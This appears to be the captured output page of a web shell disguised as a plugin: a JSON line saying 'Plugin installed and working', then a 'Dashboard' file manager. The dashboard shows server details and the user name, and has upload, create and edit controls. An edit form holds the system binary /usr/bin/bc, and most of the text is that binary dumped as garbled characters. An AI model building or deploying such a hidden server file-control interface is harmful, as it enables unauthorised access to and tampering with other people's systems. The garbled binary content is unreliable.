{"ok":true,"status":"active","msg":"Plugin installed and working","php":"8.3.33","server":"Apache","time":"2026-08-21 20:07:56"}
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Dashboard</title>
    <style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:Arial,sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
        .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; }
        .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; }
        .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; }
        .system-info { display:flex; gap:15px; font-size:12px; color:#888; flex-wrap:wrap; }
        .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; }
        .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; }
        .path-navigation a:hover { background:#333; color:#fff; }
        .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; flex-wrap:wrap; }
        .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; }
        .button:hover { background:#333; border-color:#00ff00; color:#fff; }
        .button-green { border-color:#00ff00; color:#00ff00; }
        .button-red { border-color:#ff0000; color:#ff0000; }
        .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; }
        .file-table { width:100%; color:#ccc; border-collapse:collapse; }
        .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; }
        .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; }
        .file-table tr:hover { background:#1a1a1a; }
        .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .folder-link:hover, .file-link:hover { color:#fff; }
        .size { color:#888; }
        .permissions { font-family:'Courier New',monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; }
        .actions { display:flex; gap:5px; flex-wrap:wrap; }
        .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; }
        .action-button:hover { background:#333; border-color:#00ff00; }
        .action-button-red { border-color:#ff0000; color:#ff0000; }
        textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New',monospace; font-size:14px; border-radius:3px; }
        .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; }
        .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; }
        .toast-container { position:fixed; top:20px; right:20px; z-index:10000; display:flex; flex-direction:column; gap:10px; max-width:350px; }
        .toast { padding:12px 20px; border-radius:5px; color:#fff; font-size:14px; display:flex; align-items:center; justify-content:space-between; gap:10px; animation:toastIn 0.3s ease; cursor:pointer; }
        .toast-success { background:#1a472a; border-left:4px solid #00ff00; }
        .toast-error { background:#4a1a1a; border-left:4px solid #ff0000; }
        @keyframes toastIn { from { transform:translateX(100%); opacity:0; } to { transform:translateX(0); opacity:1; } }
        .search-input { background:#000; border:1px solid #444; color:#fff; padding:6px 12px; border-radius:3px; font-size:13px; width:200px; margin-left:auto; }
        .search-input:focus { outline:none; border-color:#00ff00; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div style="display:flex; justify-content:space-between; align-items:center;">
                <div>
                    <h1>Dashboard</h1>
                    <div class="system-info">
                        <span>PHP: <b style="color:#ff9900">8.3.33</b></span>
                        <span>OS: <b style="color:#ff9900">Linux</b></span>
                        <span>User: <b style="color:#ff9900">pablod78</b></span>
                    </div>
                </div>

            </div>
        </div>
        
                
        <div class="path-navigation">
                                            <a href="?p=%2F">/</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr">usr</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr%2Fbin">bin</a>
                    </div>
        
        <div class="tools">
            <button class="button button-green" onclick="document.getElementById('b64upload').click()">📤 Upload</button>
            <input type="file" id="b64upload" style="display:none" onchange="uploadFileB64(this)">
            <button class="button" onclick="showCreateFile()">📝 New File</button>
            <button class="button" onclick="showCreateFolder()">📁 New Folder</button>
            <a href="?p=%2Fusr%2Fbin" class="button button-red">Close</a>            <input type="text" id="search-input" class="search-input" placeholder="🔍 Search..." onkeyup="searchFiles(this.value)">
        </div>

        
                    <div class="edit-container">
                <div class="edit-title">Editing: bc</div>
                <form method="post">
                    <input type="hidden" name="edit_path" value="/usr/bin/bc">
                    <textarea name="edit_content">ELF          &gt;    �W      @       8]         @ 8  @         @       @       @       �      �                                                                                        �      �                                           �      �                    �       �       �      L_      L_                   @L     @\     @\     �      �                   XL     X\     X\                                8      8      8      0       0                    h      h      h      D       D              S�td   8      8      8      0       0              P�td   �,     �,     �,     D      D             Q�td                                                  R�td   @L     @\     @\     �      �             /lib64/ld-linux-x86-64.so.2               GNU   �          � �                   GNU [�Y�W,E�u���&amp;�=�0�         GNU                      2          ! �2   3   5   )�fUa9�2�䫐Lg���                            �                                          l                      �                     �                     E                     U                      �                      v                                            �                     �                      �                     �                      �                                          �                      �                      �                     �                      f                     T                     ~                     �                      &gt;                     U                     �                                            �                     0                     �                      �                                          �                      o                     �                      �                      �                     �                     7                     g                      �                      x                      ,                       �                     �                     F   &quot;                   +                                          �     �b            %    �b            q      c            �     �b            Z    �b            �    �b             _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable __cxa_finalize __libc_start_main exit free stderr __fprintf_chk fwrite optind getopt_long malloc __printf_chk __stack_chk_fail memset __errno_location fileno isatty realloc calloc stdout __snprintf_chk strlen __ctype_b_loc stdin getc memcpy strcat strcmp __vfprintf_chk fputc rl_instream readline fflush strncpy read add_history unstifle_history __assert_fail signal puts random fopen strdup fclose putchar setvbuf getenv strtol rl_readline_name using_history libreadline.so.8 libc.so.6 GLIBC_2.3 GLIBC_2.14 GLIBC_2.4 GLIBC_2.34 GLIBC_2.3.4 GLIBC_2.2.5                                                                       #         ii   -     ���   7     ii   B     ���   L     ti	   W     ui	   c      @\            `X      H\             X      P\            P\      `            ��      (`            ��      0`            (�      8`            h�      @`            ��      H`            �      P`            (�      X`            h�      ``            ��      h`            �      p`            �      x`            P�      �`            ��      �`            �      �`            �      �`            (�      �`            h�      �`            ��      �`            �      �`            (�      �`            h�      �`            
�      �`            ��      �`            �      �`            �      �`            (�      �`            h�      �`            ��       a            �      a            (�      a            h�      a            ��       a            �      (a            @�      0a            ��      8a            ��      @a             �      Ha            @�      Pa            p�      Xa            ��      `a            ��      ha            8�      pa            x�      xa            ��      �a             �      �a            @�      �a            �      �a            �d     �a            &#039;�      �a            ,�       b            8�      b            �d      b            @�      0b            �d     @b            F�      Pb            �d     `b            O�      �b            W�      �b            �d     �_                   �_        
           �_                   �_        ,           �_        /           �b        2           �b        3           �b        5           �b        6           �b        7            c        4           p^                   x^                   �^                   �^                   �^                   �^                   �^                   �^        	           �^                   �^                   �^                   �^                   �^                   �^                   �^                   �^                   �^                   �^                    _                   _                   _                   _                    _                   (_                   0_                   8_                   @_                   H_                   P_                    X_        !           `_        &quot;           h_        #           p_        $           x_        %           �_        &amp;           �_        &#039;           �_        (           �_        )           �_        *           �_        +           �_        -           �_        .           �_        /           �_        0           �_        1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           ��H��H��? H��t��H���     �5:&gt; �%;&gt;  ��h    �������h   ��������h   �������h   �������h   �������h   �������h   �������h   ��q������h   ��a������h	   ��Q������h
   ��A������h   ��1������h   ��!������h   ��������h   ��������h   ������h   �������h   ��������h   �������h   �������h   �������h   �������h   �������h   ��q������h   ��a������h   ��Q������h   ��A������h   ��1������h   ��!������h   ��������h   ��������h   ������h    �������h!   ��������h&quot;   �������h#   �������h$   �������h%   �������h&amp;   �������h&#039;   ��q������h(   ��a������h)   ��Q������h*   ��A������h+   ��1������h,   ��!�������%e; D  ���%]; D  ���%U; D  ���%M; D  ���%E; D  ���%=; D  ���%5; D  ���%-; D  ���%%; D  ���%; D  ���%; D  ���%; D  ���%; D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%�: D  ���%}: D  ���%u: D  ���%m: D  ���%e: D  ���%]: D  ���%U: D  ���%M: D  ���%E: D  ���%=: D  ���%5: D  ���%-: D  ���%%: D  ���%: D  ���%: D  ���%: D  ���%: D  H�%   fD  ��AWAVAUATI��U��1�SH��(	  dH�%(   H��$	  1��|������(  H�=�&lt; 1ɺ   1�L�-��  ���L�����H��H��ttL���@���H�D$P����	  �   �f�     H�����t7&lt; t�H�\�P��W��tf��CH����u�Hc���t�� �CH����u�H�t$P�t8  ��L���j8  H�=��  �.���H��t
��=    H�=�  ����H��H��t�
   1������= ����t
��= F   ��&lt;     �G:  H�=��  H��&lt; �T�����&lt;     H��;  �x&lt;     ��&lt;  1��   H�Y&lt;     H�F&lt;     �4&lt; 
   �&amp;&lt; 
   �&lt;     �
&lt; ������;  �F  1��   H��; �E  1��   H��; H�@ � ��E  1�H�@ � �4  �=�&lt;  H��;     ��;  ��;  �  H��;     ��;    ��;    ��;    �A  �e&lt;  �]&lt; ��;    覲  ����  �=g&lt;  �f  H��$@  E1�E1��&lt;     L��$�  I��H���&lt; ����fD��$@  H�D$�   L�t$H�D$ �D$0    Mc�H�s B�h�D$=p���tI��; ����v  ���&#039;  �   =$  ��  �D$�=�  wH�H�F�  �A9��  H���  B�(����   �|$0 ��  �|$0u�=M;  �  �b  H���  H�S�  ��L9��H  L�k�H��I��H�� B�h=p���t׃�=�  w�H�f�&lt;Bu�D�$AD��E��~�H��: �D$0   I��H��I��  ��H���  Lc�B�*�   )ʈ$Hc�M�$փ�p��   H�&#039;�  ��Hc�H�&gt;��A�F�uA�tH�=w�  1��Y  �����I�n�H�� L!�H��I���E &lt;=��*  �n&amp;  &lt;!��&#039;  &lt;&lt;u�}=��,  H�=o�  腳  H�����D  �$L��H��    H�H)�H�&lt;�  H)�B�(L�bL�rH��H���  �;��5H����B����  ��  H�?�  D�$BD��f�AH�YH�L$H�	I�T�H9���   L)�H��H�H��H��&#039;  �N%  �&#039;  H9�HF�H��H�T$H�| ���I��H���#%  H�SL��H���D���H�D$H�t$L�4�    L��H�&lt; I�lE H�&lt;$H������L;|$ tL�����H�$L�N�t5�I�D�H9���$  H�l$M��A������L;|$ tL���P����=�8  �  1��l���H�=8 L�l$HH�\$(D�t$4H�\$@� L�t$8��8 ��8 ����   �{8     1�����H���  D�$BD��E��������|$0H�I8 H���D8 ������I�V��I���|$0�v���Hc�H�=�  f;4W�S���H�2�  D�$PD���N���H�\$(L�l$H�  ��7   H�\$@D�t$4L�t$8H�H�4�  ��/���H�R�  H�6 H��5 H��5 �����t����
   �;�������H�=μ  1���7 �V  �;���H�5E.  �   �K��������   �����   �B����������s7 ����=7  ��   �=�6  ��6    u
��6    H�=�6  ��!  H�=�6  ��!  H��6 H���;  H��6 H�&lt;� �)  H�ЋB �E6 H�BH�H�[6 H�&lt;6 � H�j6 �@6 L�l$HH�-��  L�%��  L�t$8D�t$4L� �  H�\$@H�\$(L�6 �6 �*6 A�M��Hc�$E1�A�   �|u �     A�E H���  H�-�  f�&lt;r �$��IE�EE�DE������H�A�D9�t3 A�p=;  ~��H�5��  ��Hc��|u �Hc�A�T9�uЍH�&amp;�  I��H�4A�|u �4$f��*�j���E��tD�565 H�&#039;5 H���  H�=��  �w��tLL��L��4 L)�L�-5 ��4 A�U A�E  ��4 ��1�A&#039;  Hc�H�&gt;���:5 ������Hc�4 L�-�4 �G렿   �)�����4 �[�  ��*t���t+��
u����E�  L�n�  ��*t�/�j�����
tă�u�H�/3 �   �   H�=�  �y���L�2�  �7����8&lt;  H�I4 H�J4 H�=S4 H�,��;  H�+4 H�E H�(4 ���H�\$(L�l$HD�t$4H�\$@L�t$8����H�=��  1��X  �*��������H�� I!������4 QL�i�  H��Hc54 D��3 �   PH�=�3 1��m�^_H�=�3 �O�  A�F��3 A�Fȉ�3 ���A��M#  ��3 D��3 L��  H��Hc5�3 H�=�3 �   A�A�A�p3 1�D�3 ��H�=g3 �ڬ  �]����O3 D�D3 L��  H��Hc5F3 H�=73 �   A�A�A�3 1�D�3 ��H�=3 胬  ���������E�Hc5�2 H�� H�=�2 L!�H��I��E���/!  L��  H���   1��J�H�=�2 �.�  ���A�.@���g#  H�=j�  ����  �����H�� L!�H	�I���~���I�&gt;1��X  �����H�� ��L!�H	�I���[���A��;#  E�N�A��=t1H�=?2 H���   1�Hc552 L��  ��H�=2 荫  E�N�Hc52 H�=2 E����&quot;  L���  H���   1��k�H�=�1 �O�  �����H�� I!�����A�&gt;=�����E�N�Hc5�1 H�=�1 E���-#  L�Ե  H���   1���H�=�1 �  �y���A�.@����!  @����!  @����!  Hc�, �����!  Hk�8H%1 �x �3���H�=��  1��MP  � ��������H�=έ  H�� I!�耪  �=}, ������H�=��  1��P  ��������H�=�  H�� L!�H��I��1��OU  ����I�~�   �V  Hc5�0 H�=�0 L�0�  ��H���   A��1���H�=�0 �  I�~�1Ҿ   �&amp;5  I���f���A�.@����!  @���k!  I�~�1�1��4  I���:���I�~�   �tV  Hc5-0 H�=0 L���  ��H���   A��1���H�=�/ �n�  1Ҿ   1��4  I����������H�� I!�����H�=	�  �;�  A�F��1+ ������/ ���A�F��J!  H�=I�  ��  �����H�� L!�H��I���{���A�F��4  H�=��  �ܨ  �����H�� L!�H��I���L���A�F��  H�=��  譨  �����H�� L!�H��I������A�n�@��uA�tH�=��  1��&#039;N  H�=��  �k�  A������H�� 	�L!��H	�I������Ǩ  ���A�.@����   @���q   1�1�1��`3  I����E1���I�~�   ��T  I�~غ   ���23  H�=ǰ  I��1���R  �d�H�=��  1���R  �Q�H�=v�  1���R  �&gt;�����H�=P�  H�� L!�H��I��1��R  ������H�=�  H�� L!�H��I��1��R  �������H�� L!�H��I���������H�� L!�H��I���������H�� I!���A�n�@����  @����  I�~�   ��S  �����H�� ��L!�H	�I���r�A�n�@��uA�tH�=1�  1��|L  H�=8�  �  A������H�� 	�L!��H	�I���)�A�n�@��uA�tH�=Ѱ  1��3L  H�=ذ  �w�  A������H�� 	�L!��H	�I�����A�n�@��uA�tH�=կ  1���K  ��, E�N�QL�ԯ  Hc5�, H�=�, H��P�PAQP1���, �   ��H�=~, H�� ��  A������H�� 	�L!��H	�I���V�A�n�@��uA�tH�=�  1��`K  E�N�W�   H��Hc5+, H�=, L��  1�AQ��H�=, AXAY�t�  A������H�� 	�L!��H	�I�����1�H�=Ϯ  �WP  D��+ H��Hc5�+ H�=�+ L���  �   E�A�A��+ 1���H�=�+ ��  ��1�H�=@�  �O  D�d+ H��Hc5m+ H�=^+ L�&#039;�  �   E�A�A�9+ 1����H�=7+ 誤  �-�A�n�@��uA�tH�=y�  1��7J  H�=��  �{�  A������H�� 	�L!��H	�I�����A�.@����  �������H�=�  H�� L!�H	�I��1��&lt;O  H�=��  � �  ��A�n�@��uA�tH�=4�  1��I  H�=;�  ��  A������H�� 	�L!��H	�I���Z�A�n�@��uA�tH�=ԭ  1��dI  H�=ۭ  訣  A������H�� 	�L!��H	�I����I�I�n�H�D$H���/  H�l$@H�\$8H��H�k�H�mH����  �9E u�H�=��  1���H  ��H�=j�  1��?N  �-�) H��Hc5�) H�=�) L�`�  �   �EA�.A��x) P�m) P1���H�=n) XZ�ߢ  �-Q) �\�A���  H�=��  辢  �A�H�=ɪ  譢  I�.H��袢  H������A�F���  ��( D��( L�w�  H��Hc5�( H�=�( �   A�F�A�A��( 1�D��( �S�H�=�( �7�  ����( APH��L��  Hc5�( D��( �   PH�=�( 1���H�=~( AYAZ��  A�F��w( A�F؉Y( �\�����H�5n�  �   1�������� H�5l�  1��   ������H�5k�  1��   ������H�5i�  1��   ��H�5l�  �   1�H���������g���  H�5a�  1��   �O����H�P�  H�5Χ  �   1��0�L�a�  1�H�7�  H�7�  H�53�  �   ��H�=I�  �l��o������A�H�� L!�H	�I���U������H�� I!��D������H�� I!��3�H�=2�  1��K  � ��S,  �D$0    ����  ��H�=٧  1��~K  D��&amp; E����  H�=Χ  1�� F  ���D��&amp; E����  H�=~�  1���E  �������H�=d�  H�� I!���  I�.H����  H������H�=�  ��  �o�H�=R�  �۟  �^��d&amp; A��C&amp; �P�R&amp; �4&amp; �;�A�.@���d  @���z  H�=ۦ  萟  ��I�~�   �ML  1��   ���*  H�=D�  I��1��nJ  ���I�~�   �L  1�1����*  I����A�n�@����  �������H�� L!�H	�I����I�.H�����I�������H�� L!�H��A��I���  H�=p�  �ٞ  H���ў  H�=��  �Ş  H������@�I�~�   �zK  I�~غ   ����)  H�=o�  I��1��I  ��Hc5% D��$ H��1�H�=�$ L���  �   �h�H�=�$ �L�  A�F؉�$ ��������E�Hc5�$ H�� H�=�$ L!�H��I��A�F�E����  &lt;+��  QL���  AQH���   1���H�=j$ XZ�۝  �^�I�~�   �J  I�n�A��H�Hk�8H$$ �x���P�����H�� L!�H	�I��H����  H�=�# H��tD�L$��D�L$H�s# H��H�q# 1�H�R�ǃ�H��u��D�L$Hc��!�H��H����  D�L$H�1# H��   �9�0   ��@��@�|�H�IH��H��u�Hc�H��D�L$8� H�T$���x�P(  Hc5i# H�=Z# L�_�  PH�T$H��1�RD�L$H�   ��H���  XZH�=&amp;# 虜  ��M�f���1�H�=��  �G  H�=��  �q�  �����H�� L!�H��I�����A�n�@���(  @���  @��Hc5�&quot; H�=�&quot; A�F�E�N��  QL���  PH���   1���H�=�&quot; A[]�  �|�A�n�@����  @����  D�Q&quot; Hc5^&quot; H���   L��  A�AE�N��,&quot; �&gt;&quot; WH�=*&quot; P1���H�=&quot; AXAY芛  �����H����! H�� D��! Hc5�! L���  L!�H�=�! H	к   D��! I��A�A��! 1��E�H�=�! �)�  �������H�� I!Ā=�!  ����=�!  ���L�?�  H��  1��   H��  H�5�  ���H�=�  �J�H�=3�  �&gt;��A�A�n�@����  @���r  @����  D�! H���   Hc5! H�=! L�Ƣ  E�N�A�A��  1��m��H�=�  �Q�  ���1�H�=��  �NE  H�=��  �2�  �����H�� L!�H��I����I�&gt;1���F  I�~�1҉��C%  I����I�~�   �F  1��   ���%  H�=��  I��1���D  �Q�I�~�   �F  I�~�1҉���$  I���.�I�&gt;1��lF  1�1�����$  I����M�f���E1�� ������H�=9�  H�� L!�H��I��1��gD  ���E1���������A�n�Hc5� H�� H�=� L!�H��I�ą��  A��L�գ  H��1��   ���H�=� �  A�&gt;+A��Hc5y L���  tL���  H�=Z H���   1�����H�=C 趘  �9�H�� H�\$(L�l$HH�\$@D�t$4� L�t$8�$   � �  �7�H�\$(L�l$H�  D�t$4H�\$@�t L�t$8��   ��H�\$(L�l$H�$  D�t$4H�\$@�� $  L�t$8���H�\$(L�l$H�#  D�t$4H�\$@�� #  L�t$8��H�\$(L�l$H�  D�t$4H�\$@�c   L�t$8�|�H�\$(L�l$H�  D�t$4H�\$@�6   L�t$8�O�H�\$(L�l$H�   D�t$4H�\$@�	    L�t$8�&quot;�H�\$(L�l$H�!  D�t$4H�\$@�� !  L�t$8���g H�5l L��H�=B A�E H�_ H)�H����x&lt; u�p �@&lt;   �5 H�5H H�0Hc5� HpH95 �l  L�$�T$(�=  L�$H���  L���  ����  HcT$(����
  �����H�=� L�,H�&lt;$L�-� ��  H�&lt;$L���  ��I����H�\$(L�l$H�  D�t$4H�\$@��   L�t$8��H�\$(L�l$H�  D�t$4H�\$@��   L�t$8���H�\$(L�l$H�  D�t$4H�\$@��   L�t$8��H�\$(L�l$H�  D�t$4H�\$@�U   L�t$8�n��	    ���H�\$(L�l$H�  D�t$4H�\$@�� L�t$8��    �   �!�H�\$(L�l$H�  D�t$4H�\$@��   L�t$8����f Hc5[ L��A�E L�-E I�����=�  ��	  �^    ��H�\$(L�l$H�  D�t$4H�\$@�n   L�t$8��H�\$(L�l$H�  D�t$4H�\$@�A   L�t$8�Z�L�%� L�l$HH�\$(D�t$4H�\$@L��L�t$8�?��H�I�D��8.u�  L���H���E &lt;0t�&lt;H�^�  H�� �E ���   &lt;\u�K H���E H��&lt;,��  A�$I����H�5. �&lt;��  &lt;~�}  ��H�=*�  1��9  L���  � �Hc5� H�  �   H�=� ���L���  ���H�-� L�l$HH�\$(D�t$4H�\$@H��L�t$8�S��L�`L���W��H��H����  L��H��� ����   H�� �  ��H�-f L�l$HH�\$(D�t$4H�\$@H��L�t$8����L�`L������H��H���q  L��H������ 1�1�H�� �&lt;&quot;u��H���E ���  &lt;
u��   ���� L��M��H�\$(D�t$4H�\$@A�H�FL�t$8H�� �F�  =L�l$H�� �	  H�5� ��    �F �� 	  ��H�-u L�l$HH�\$(D�t$4H�\$@H��L�t$8���L�`L��� ��H��H����
  L��H������� 
  H�� �
  ��� ��H� H�\$(L�l$HH�\$@D�t$4� L�t$8�U 	  �G �	  �h�H�\$(L�l$H�  D�t$4H�\$@�&quot;   L�t$8�;�H�\$(L�l$H�  D�t$4H�\$@��   L�t$8��H�\$(L�l$H�  D�t$4H�\$@��   L�t$8����H�\$(L�l$H�  D�t$4H�\$@��   L�t$8���H�\$(L�l$H�  D�t$4H�\$@�n   L�t$8���H�\$(L�l$H�  D�t$4H�\$@�A   L�t$8�Z��H�\$(L�l$H�  D�t$4H�\$@�   L�t$8�-��H�\$(L�l$H�  D�t$4H�\$@��   L�t$8� ��H�\$(L�l$H�  D�t$4H�\$@��   L�t$8����H�\$(L�l$H�  D�t$4H�\$@��   L�t$8���H�\$(L�l$H�  D�t$4H�\$@�`   L�t$8�y��H�\$(L�l$H�  D�t$4H�\$@�3   L�t$8�L��H�\$(L�l$H�  D�t$4H�\$@L�t$8�s���{ ��  H�[H�����H�\$8H�l$@H�D$H����   H�l$@H�\$8H��H�k�H�mH��t�9E u�H�=��  1��4  ��{ ��  H�[H��u�H�l$@H�\$8H�5p�  H��tpH�l$@H�\$8H��H�l$�	H�mH��t@�9E u�H��1��]4  H�56�  ��H�] H�� �9��H�Z H�� ���H�[H��u�H�\$8H�l$@H���1  H�|$H�D$8�t1  H�|$8H�D$@���H�|$@H�D$H���H�T$H�|�  I�~Ⱦ   ��:  �t$@H��Hc5� �t$@A��L���  �   H�=y �� 1�����H�=e AZA[�ԍ  Hc� A�V�H��Hk�8H+ �P�#  H�|$�  � �    A�F����H�=u�  1��23  �&gt;��M���=��H�=�  1��3  �h���H�=ϕ  1��d8  ��H��1��U8  H�V�  ���&lt;&gt;�����}=��  H�=	�  ��  ���A�$ H�-2 H������L�`L������H��H���V  L��H������u   H�f �  ���@��t�� ���  1�H�=��  �R2  �  �3   �Q��Hc5 H���   1�H�=� L�4�  �y��H�=� �]�  ����Hc5� H���   1�H�=� L���  �C��H�=� �&#039;�  ���H�=x�  ��  ���L��  RP���H�=Y�  �  �[�H�=�  ��  �\���E &lt;0�W  &lt;1���H�=�  �  ��H�� H�� Lc-� H��LhL�-� �  H�=� H�y�  L���  Hc��a���H�=ɑ  1��1  L���  �����@H�=|�  ��1��0  L�a�  �f��H�=�  1���0  L�G�  �L��A��L���  H��1��   ���������L���  H��1�A��   ���H�=h �ۊ  A�&gt;+A��Hc5] L���  ���L���  ���H�=��  1��V0  ��H�=|�  1��C0  ���H�=F�  1��00  �,�H�=�  1��}5  �W�H�=��  1��
0  �:�H�=�  1��/  ��H�=h�  1��D5  ��H�=��  1���/  �{�H�=U�  1��5  �^�Hc5� H���   1�H�=x L���  �����:�H�=ɑ  1��/  ���H�=ޑ  1��n/  ���H�=��  1��[/  ���=H  ��     ��    ��  L�$�|�  L�$H�e�  L���  ����  �=s  ���H�=� �9  L�b�  �g��APL��  AQ�4�A��&lt;+��  L�Ɠ  ARAQ��H�=)�  1��.  ���H�= �  1��4  ���H�=͞  1���3  ���H�=�  1��{.  ���H�=��  躈  �0��H�=#�  1��W.  ����8   �  �Q��H�=�  1��0.  ���A��L���  H��1��   �q�����H�=`�  1��-  ���H�=6�  1��K3  �e��H�=��  1���-  ���H�=��  1��%3  ���H�=5�  ��  �#�H�=��  1��-  ��A��L��  H��1��   ��������H�=�  1��o-  ���H�=��  1��\-  �|��H�=��  1��2  �_���  H�=o�  胇  ���H�=��  �r�  ��H�=N�  �1  Hc�H�&lt;$L�,L�-� �  H��  H�&lt;$L�X�  Hc�f�&lt;q H��  t�Y L�-J �C�HLc�B�TM ��Lc�G�TD9�u��H��  �P������;  ���I��L�- �b�H�� �   H�� � �������0����L�&lt;�  ASAQ��H�=n�  膆  ������1�I��^H��H���PTE1�1�H�=A���3 �f.�     H�=	 H� H9�tH� H��t	���    ��    H�=�
 H�5�
 H)�H��H��?H��H�H�tH�� H��t��fD  ��    ���=�
  u+UH�=�  H��tH�= �Y���d�����
 ]� ��    ���w����    H�� L�� AWAVD�� AUATUSH�D$�I9���   E1�L�=��  H�=�  H�5+�  L�d�  H�}�  D  A�����   H�E�  D��A��E��D��Icù   fA�&lt;G DE��GME�EE�A�Mc�F�NE9�t2�     A�@A��f=;~����H��GD�Mc�fF;Nu؉Ս)H���  I���AA��L;T$��^���E��tL�5�
 D�-�
 [D��]A\A]A^A_�D  �   A�   �   �E���ff.�     ����	    Ð����	 H��    H)�H��
 H��H�P�z	 �H�q	 ���     SI���GA��;Ft!gA�����E��tA�8E�A��D��[�@ �_D�^H�W D9�D��N��H�F ���   D  H��H����t;�2�8@8�t�@8�s� A�   E��t�A�8[E�A��A��D���f�     E1�D9��{���~2D)�Hc�H�f�     H���z� u�H9�u�E1��P���f�     A)�Ic�H��
D  H9�t�H���x� t�����t��2�8�_���ff.�     @ 1���~1f.�     H��H�����B�H�H��~H=���~�1҅�HO�H��H�څ�HE��ff.�     ���PX�   �   H�5}�  H��� ��1����f�     H�H��t@SH���hu&amp;H�xH��t�`��H�H�^ H�PH�H�P H�    [��    ��    U��SH��H�� H�H��t�ht;H�    @��tH�x �@H�H��[]�f�H�i �@H�H��[]� H�xH��t����H�H�� H�PH�H�� �H��t#SH���    H��H�[���H��u�[�D  ��    UHc�SH��    H)�H��H�� H�,�H�]0�E  H�E    H��t@ H��H�[�&lt;��H��u�H�E0    H�](H��tfD  H��H�[���H��u�H�E(    H�] H��tfD  H��H��   ����H�] H��u�H��[]�f�     H����   AUATI��USH����~=�n�H��L��   �     H�;��H������L9�u�H��L��[]A\A]�{�� H��H��   fD  H�H��t3�hu&amp;H�xH��t�L��H�H�J H�PH�H�&lt; H�    H��H9�u��f��ff.�     @ H����   USH��H���7@ H�! H��H�(H��tH�UH��H��V���H������H�[H��tZHc���H�� ��H�H��H�(H��t�H�UH��} uH�E H��tH�8�p���H�} �|��H���t��H�[H��u�H��[]�@ �ff.�     @ PXH�^�  �   1�H��H��H�= �}���   �S�� PXH�=W�  �&#039;   �   H��H�� �=���   �#�� AWL�=G�  AVI��AUATL�%W UH�-̀  S��H��dH�%(   H�D$1�L�l$�a     M��L��H��L�����f�����t*��t��c��wkIc�L�&gt;��H�A��H� � 9 �v  �   ���H����  Hc� H�@    H��I��H�H�� H��u�H�� �H�C�  I��   L�l�  PH�l�  L���  PH���  H���  PH�΋  H�5׊  P1����H�� �   �����W    �	����   L�΋  1�H��  H��  H�5�  �z��1�����    �����    ����    ����� ���H�s�  I��   L���  PH���  L�ŉ  PH�͊  H��  PH���  H�5�  P1�����H�� 1��$����    �&lt;���H�D$dH+%(   uH��[]A\A]A^A_�����|��ff.�     �AWAVAUATUSH��D�-[ L�5� L�%E A�m Hcŉ-@ L�&lt;�    L��H)�H���)��H���,  L��H�� H�����H���  H�� E����   Ic�1�1�fD  �Ao�AoLL�AoT T I�t0H�t0I�4�H��8H�4�H��H9�u�E��Ic�H��    H)�H��f�� �   �C ���H����   A��H�CH��8H�C�   H�C�    H�C�    H�C�    H�C�    D9��E��uH��[]A\A]A^A_�f�     L���X���H��L��[]A\A]A^A_�B���f���~�E1��P�������ff.�     @ AWAVAUATUSH��D�5�  L�%4  H�-  E�n Mc�D�-�  I��L�����H����   L��H�   H�����H����   H��  A����   Ic��   fD  I��H��H�L� H��H��H9�u�Ic�A�NH�&lt;É�)�9ȹ   H��   HO�1��M���E��uH��[]A\A]A^A_�f�     L���8���H��H��[]A\A]A^A_�&quot;���f�A��~��   ����ff.�      AWAVAUATUSH��D�5��  L�%��  H�-��  E�n Mc�D�-�  I��L�����H����   L��H��  H���h���H����   H���  A����   Ic��   fD  I��H��H�L� H��H��H9�u�Ic�A�NH�&lt;É�)�9ȹ   H��   HO�1��-���E��uH��[]A\A]A^A_�f�     L������H��H��[]A\A]A^A_����f�A��~��   �����ff.�      H�	�  Hc�SH��H�H��t	[��    �   �v���H��tH�*�  H��BH�[��y���f�     AWHc�AVAUATUSH��H��(dH�%(   H�D$1�H�}�  L�$�I�,$H����  L�u M����  A�vA��A��H�غ   A��?H��D�$$�fD  ������?��H��A�ׅ�u�9��9���   1��Sf.�     I�H�{H�C    Hǃ�      H��H���)���   H����H�A��I�A��fE�nD9�}U�   �]���H��H���k  fE��u�H��  H��   �rf.�     H�H��H9�u�F@�BH���  �I�